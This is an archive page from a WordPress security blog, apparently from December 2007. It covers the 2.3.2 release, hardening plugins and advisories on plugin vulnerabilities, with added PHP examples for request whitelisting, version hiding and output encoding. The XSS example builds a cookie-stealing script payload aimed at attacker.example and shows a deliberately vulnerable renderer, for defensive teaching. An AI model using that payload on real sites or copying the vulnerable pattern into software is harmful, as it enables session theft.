Archive for December, 2007
WP 2.3.2 Security Fixes
A new version of WordPress (2.3.2) is now available for download.
The update fixes some critical security vulnerabilities.
Interestingly, WordPress has decided to turn error display off by default in this release. That makes our bs-wp-noerrors plugin redundant on 2.3.2, though it remains useful for those of us who have not yet trusted the 2.3 branch enough to upgrade.
This version also presents some additional clean [...]
bs-wp-sandbox plugin: Lock WP Functions
The BlogSec WordPress Sandbox plugin works on a whitelist principle. We accept all pages and posts (including wp-admin, feeds and xmlrpc) but deny requests for any other resources or WordPress functions.
I came up with the idea for this plugin when developing my homepage WithDK.com (where it is currently being tested). I wanted WordPress to act [...]
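To make the whitelist principle described above concrete, here is an added example written for this page; it is not the bs-wp-sandbox plugin's own code, and the plugin and function names are invented. It hooks `template_redirect` and refuses any front-end request that does not resolve to a post, a page, the home page or a feed. wp-admin and xmlrpc.php are served by their own entry points and never reach this hook, so they pass untouched, which matches the behaviour the post describes; author archives, search, attachment pages and arbitrary query strings get a 403. The WordPress API calls used are current ones rather than 2.3-era ones.

```php
<?php
/*
Plugin Name: Example Request Whitelist (hypothetical, not bs-wp-sandbox)
Description: Deny every front-end request that is not a post, page, home page or feed.
*/

// Whitelist: the only front-end request types this site is willing to answer.
// Anything not matched here is refused before a template is even chosen.
function example_request_is_whitelisted() {
    return is_front_page()
        || is_home()
        || is_singular( array( 'post', 'page' ) )
        || is_feed();
}

function example_enforce_request_whitelist() {
    // wp-admin/* and xmlrpc.php use their own entry points and never fire
    // template_redirect, so they are implicitly allowed, as in the post.
    if ( example_request_is_whitelisted() ) {
        return;
    }

    // Let genuine 404s through so a broken link still produces a normal
    // 404 page rather than looking like a block. Drop this check if you
    // would rather answer 403 for everything that is not whitelisted.
    if ( is_404() ) {
        return;
    }

    nocache_headers();
    wp_die(
        'This request is not permitted on this site.',
        'Forbidden',
        array( 'response' => 403 )
    );
}
add_action( 'template_redirect', 'example_enforce_request_whitelist' );
```

Drop the file into wp-content/plugins/, activate it, then request /?s=test or /?author=1 and confirm you get a 403 while individual posts and /feed/ still load. One caveat a plugin cannot fix: it only sees requests that are routed through WordPress. A direct request for a PHP file under wp-content or wp-includes never loads the plugin at all, so that class of resource has to be denied with a web-server rule.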
bs-wp-noversion plugin: Removes WordPress Version
The BlogSecurity WordPress Noversion plugin (bs-wp-noversion) prevents WordPress version leakage. Another simple, yet very useful, WordPress security plugin.
A lot of attackers and automated tools try to determine software versions before launching exploit code. Removing the version string from your WordPress blog may discourage some attackers and will certainly hinder worms and other automated attack tools that choose their exploits by the version a site advertises.
Plugin Name: [...]
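The following is an added example of how the version string can be scrubbed from the places WordPress itself emits it; it is written for this page and is not the bs-wp-noversion plugin's code, and the plugin and function names are invented. It covers the generator meta tag in the HTML head, the generator element in feeds, and the `?ver=` query string WordPress appends to core scripts and stylesheets, which gives the version away even when the generator tag is gone.

```php
<?php
/*
Plugin Name: Example Version Scrubber (hypothetical, not bs-wp-noversion)
Description: Remove the WordPress version string from the places core emits it.
*/

// 1. The <meta name="generator" content="WordPress x.y.z"> tag in the HTML head.
remove_action( 'wp_head', 'wp_generator' );

// 2. The generator element in RSS/Atom feeds. wp_generator() and the feed
//    templates both pass their output through this filter, so an empty
//    string removes the version from every feed type at once.
add_filter( 'the_generator', '__return_empty_string' );

// 3. The ?ver=x.y.z query string on enqueued scripts and stylesheets.
//    For core assets this is the WordPress version itself. Note that
//    stripping it also removes cache-busting for themes and plugins that
//    rely on the same parameter, so weigh that against the leak.
function example_strip_version_query( $src ) {
    if ( false !== strpos( $src, 'ver=' ) ) {
        $src = remove_query_arg( 'ver', $src );
    }
    return $src;
}
add_filter( 'script_loader_src', 'example_strip_version_query' );
add_filter( 'style_loader_src', 'example_strip_version_query' );
```

Treat this as a speed bump rather than a fix: the readme.html shipped in the web root states the version in plain text and is not touched by any plugin hook, so delete it or block it at the web server, and a determined attacker can still fingerprint a release from the hashes of its static files. The only real defence against a version-specific exploit is running a version it does not work on.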
WordPress PictPress File Include Vulnerability
An exploit affecting the WordPress PictPress plugin has been made publicly available.
WP-ContactForm HTML Injection Vulnerability
The popular WP-ContactForm plugin has been found vulnerable to HTML Injection.
This could allow an attacker to compromise your blog if you are logged in to it while visiting a page that carries the injected attack, since anything the injected script does runs with your authenticated session. Another common way of delivering the attack is a phishing-style e-mail.
BlogSec is not aware of any fixes as yet. We [...]
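To show the class of bug and its fix, here is an added example; it is not WP-ContactForm's code, and the function names and the sample input are invented. A contact form that echoes a submitted field back into the page without encoding lets an attacker place script in that field. If the person who then views the page is an authenticated administrator, the script runs inside their session and can act on the blog in their name, which is the attack the summary above describes.

```php
<?php
// Hypothetical contact-form "thank you" page, not WP-ContactForm's code.
// Both functions render the submitted name back to the visitor; only one is safe.

// VULNERABLE: the untrusted field is written straight into the page.
// A submission (or a crafted link, if the form accepts GET) carrying
// name=<script>...</script> executes in the browser of whoever views the result.
function render_thanks_vulnerable( $name ) {
    return '<p>Thanks, ' . $name . '. We will be in touch.</p>';
}

// HARDENED: encode for the HTML text context before output.
// ENT_QUOTES also encodes ' and ", so the same helper is safe inside a
// quoted attribute value; ENT_SUBSTITUTE keeps invalid UTF-8 from blanking
// the whole string, which would otherwise be an easy way to hide the field.
function render_thanks_safe( $name ) {
    $safe = htmlspecialchars( $name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    return '<p>Thanks, ' . $safe . '. We will be in touch.</p>';
}

// Inside WordPress, prefer the core helpers, which do the same encoding and
// pick the right variant for each output context:
//   esc_html( $name )  for element text
//   esc_attr( $name )  for attribute values
//   esc_url( $url )    for href and src

// Constructed sample input: what an attacker would put in the name field
// to ship the viewer's session cookie to a host they control.
$hostile = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

echo render_thanks_vulnerable( $hostile ), "\n"; // the script element is emitted as markup
echo render_thanks_safe( $hostile ), "\n";       // the same input is emitted as literal text
```

The rule is the same whether or not you are in WordPress: every value that came from a request is encoded for the exact context it is written into, at the point of output, with no exceptions for fields that "only contain names". Encoding on output rather than filtering on input also means the stored data stays intact for legitimate uses such as e-mailing the message to the site owner.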